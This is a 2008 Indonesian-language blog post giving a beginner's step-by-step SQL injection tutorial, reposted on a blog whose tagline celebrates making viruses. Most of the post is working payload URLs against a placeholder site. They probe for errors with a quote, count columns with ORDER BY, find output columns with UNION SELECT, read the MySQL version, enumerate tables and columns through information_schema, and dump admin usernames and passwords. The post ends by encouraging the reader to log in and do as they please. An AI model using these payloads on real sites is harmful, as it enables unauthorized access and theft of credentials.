Darkside of Oktavianus

Making virus and all of them as our friends

SQL Injection Step By Step For Dummy

Posted by oktavianus pada September 16, 2008

Oleh Cruz3N
Published: September 15, 2008

Semuanya berawal karena gua ngeliat-liat semuanya pada rame masalah web attack…
Dalam hati gua hanya bisa berkata “MAMPUS GUA…GUA KAGAK NGERTI APA-APA SOAL BEGINIAN!!!”
Akhirnya gua liat-liat, baca-baca dan coba-coba tentunya, langsung dah dengan PD-nya nulis artikel kayak gini…

Hahahaha…Emang gua gak terlalu jago-jago amat tapi disini gua cuman mau sharing atau berbagi dari apa yang gua tau dan dapet. Sekarang gua akan menjelaskan bagaimana cara melakukan SQL Injection versi Pemula tentunya. Untuk yang dah jago banget diharapkan untuk tidak membaca.
Hehehe…Becanda kok, yang master dimohon tanggapannya supaya kalo ada kesalahan atau apapun itu gua bisa mengkoreksinya…

Tanpa basa basi langsung aja kita memulainya…

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100′

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–“. Terserah aja…

Kalo “+” sebagai penghubung perintah…

6. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9”
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)

8. Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…

Misalnya yang lo liat adalah table “admin”

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…

*/ Akhir kata…
Makasih buat perhatiannya…Kalo ada kesalahan mohon dimaafkan. Mungkin karena keterbatasan ilmu yang gw punya sekarang…Kalo ada tambahan silahkan…

*/Thanks Too
~ My Jesus Christ. My Everything, without YOU im Nothing
~ Om PIRUS, T0m dkk yang menjadi pedoman gw
~ Semua Jasakomers disini…You are my Inspirations…
Terutama Aurel666, Tomahawk, Kucing Black, Play, Pitaqh,Hadoitz, Neonmap, massmissile, Eva-00 dkk
~ Witha…I Love You So Much…

Dan semuanya yang dah membuat hidup gua lebih berarti…

Best Regard
Cruz3N

*/Contact
Blog : http://cruzenaldo.co.cc
EMail : cruz3n@jasakom.org

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: